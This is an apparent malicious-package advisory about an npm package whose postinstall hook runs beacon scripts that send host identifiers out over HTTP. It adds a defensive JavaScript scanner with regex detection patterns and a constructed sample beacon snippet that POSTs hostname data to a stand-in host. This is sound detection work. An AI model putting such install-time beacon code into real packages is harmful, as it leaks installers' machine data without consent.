MAL-2026-5762

Malicious code in npm-sandbox-research-e9f0 (npm)

Details

---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (a18a9932f78294e22aa0a85077b9318233ab0952bc8788ae8987fce3e5002c93)

Package declares a postinstall hook ("postinstall": "node run.js") that executes automatically on npm install. The tarball ships beacon scripts (beacon13.js, beacon_linux.js) that combine require('child_process'), require('os'), and require('http')/http.request to gather host identifiers (os.hostname(), os.platform()) and transmit them via HTTP POST/GET requests. This is the canonical install-time host-recon and exfiltration shape: lifecycle hook auto-execution, host enumeration via the os module, command execution capability via child_process, and outbound HTTP. Installing this package causes immediate disclosure of host metadata and provides a code-execution surface on the installer's machine.
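A static triage check for the shape described above, written as an added example (not code from the advisory or from the package). The file contents in SAMPLE and BENIGN, including what run.js does and the collector.invalid host, are constructed for illustration; only the hook command and the file name beacon_linux.js come from the report.

```javascript
// Added example: flag an unpacked npm tarball that pairs an install-time
// lifecycle hook with a file combining child_process + os + http.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall'];

// Signal name -> pattern; accepts both require('x') and require('node:x').
// Aliased or dynamically built module names are not caught by these patterns.
const SIGNALS = {
  child_process: /require\(\s*['"](?:node:)?child_process['"]\s*\)/,
  os_module: /require\(\s*['"](?:node:)?os['"]\s*\)/,
  http_module: /require\(\s*['"](?:node:)?https?['"]\s*\)/,
  host_enum: /\bos\.(?:hostname|platform)\s*\(/,
  http_request: /\bhttps?\.request\s*\(/,
};

// files: map of path -> text content of the unpacked tarball.
function auditPackage(files) {
  const scripts = JSON.parse(files['package.json'] || '{}').scripts || {};
  const hooks = LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === 'string')
    .map((h) => ({ hook: h, command: scripts[h] }));
  const findings = [];
  for (const [file, source] of Object.entries(files)) {
    if (!/\.(?:c|m)?js$/.test(file)) continue;
    const hits = Object.keys(SIGNALS).filter((k) => SIGNALS[k].test(source));
    const fullShape = ['child_process', 'os_module', 'http_module']
      .every((k) => hits.includes(k));
    if (hits.length) findings.push({ file, hits, fullShape });
  }
  // Block only when code runs automatically AND some file has the full shape.
  return { hooks, findings, block: hooks.length > 0 && findings.some((f) => f.fullShape) };
}

// Constructed sample input; these strings are scanned, never executed.
const SAMPLE = {
  'package.json': JSON.stringify({ scripts: { postinstall: 'node run.js' } }),
  'run.js': "require('./beacon_linux.js');",
  'beacon_linux.js': [
    "const cp = require('child_process');",
    "const os = require('os');",
    "const http = require('http');",
    "const id = os.hostname() + '/' + os.platform();",
    "http.request({ host: 'collector.invalid', method: 'POST' });",
  ].join('\n'),
};
const BENIGN = {
  'package.json': JSON.stringify({ scripts: { test: 'node t.js' } }),
  'index.js': "const os = require('os'); module.exports = () => os.platform();",
};
console.log(JSON.stringify(auditPackage(SAMPLE), null, 2));
```

Running the same check in CI against a dependency's tarball before install, together with `npm install --ignore-scripts`, keeps the hook from executing while the package is reviewed.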

Affected packages

npm / npm-sandbox-research-e9f0

No fixed version published yet for npm-sandbox-research-e9f0 (npm). Pin to a known-safe version or switch to an alternative.